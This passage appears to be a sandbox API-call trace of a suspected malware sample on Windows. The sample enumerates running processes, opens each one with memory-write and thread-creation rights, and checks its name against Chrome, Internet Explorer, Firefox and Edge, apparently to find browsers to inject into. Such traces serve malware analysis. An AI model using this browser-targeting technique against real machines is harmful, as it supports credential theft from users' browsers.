	[0248.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.852] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0248.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.852] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.852] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0248.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.853] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.853] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9cf8
	[0248.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.854] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.855] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.855] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.855] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.856] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0248.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9cfc
	[0248.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.857] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0248.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.857] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.857] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0248.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.858] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.858] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0248.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9d00
	[0248.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.859] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0248.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.859] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.860] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0248.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.860] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.860] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0248.861] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9d04
	[0248.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.861] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0248.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.861] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.862] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0248.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.862] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.862] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0248.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9d08
	[0248.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.863] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0248.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.863] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.864] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0248.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.864] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.864] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.865] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9d0c
	[0248.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.865] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.865] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.865] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.866] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9d10
	[0248.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.867] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.867] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.868] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.868] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.868] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.869] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9d14
	[0248.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.869] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.870] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.870] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.870] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.870] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9d18
	[0248.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.871] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.872] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.872] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.872] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.872] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9d1c
	[0248.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.873] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.874] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.874] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.874] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.874] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.875] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9d20
	[0248.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.875] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.876] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.876] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.876] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.877] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9d24
	[0248.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.877] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.878] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.878] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.878] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.879] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0248.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9d28
	[0248.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.879] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0248.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.880] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.880] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0248.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.880] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.881] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.881] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9d2c
	[0248.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.882] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.882] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.882] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.883] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.884] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0248.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9d30
	[0248.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.885] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.885] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.886] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.886] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.886] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.887] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9d34
	[0248.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.887] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0248.887] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.887] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.888] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0248.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.888] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.888] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.889] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9d38
	[0248.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.889] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.890] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.890] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.890] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.890] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.891] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9d3c
	[0248.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.891] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0248.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.892] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.892] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.892] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0248.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.893] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.893] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0248.894] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9d40
	[0248.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.894] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0248.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.894] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.894] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0248.895] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.895] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.895] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0248.896] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9d44
	[0248.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.896] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0248.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.896] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.896] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0248.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.896] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0248.897] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9d48
	[0248.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.898] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0248.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.898] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.898] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0248.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.899] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.899] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0248.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0248.900] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0248.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9d4c
	[0248.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.901] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0248.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.901] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.902] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0248.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.902] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.903] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0248.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9d50
	[0248.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.904] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0248.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.904] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.904] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0248.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.905] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.905] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0248.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9d54
	[0248.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.906] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0248.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.906] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.906] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
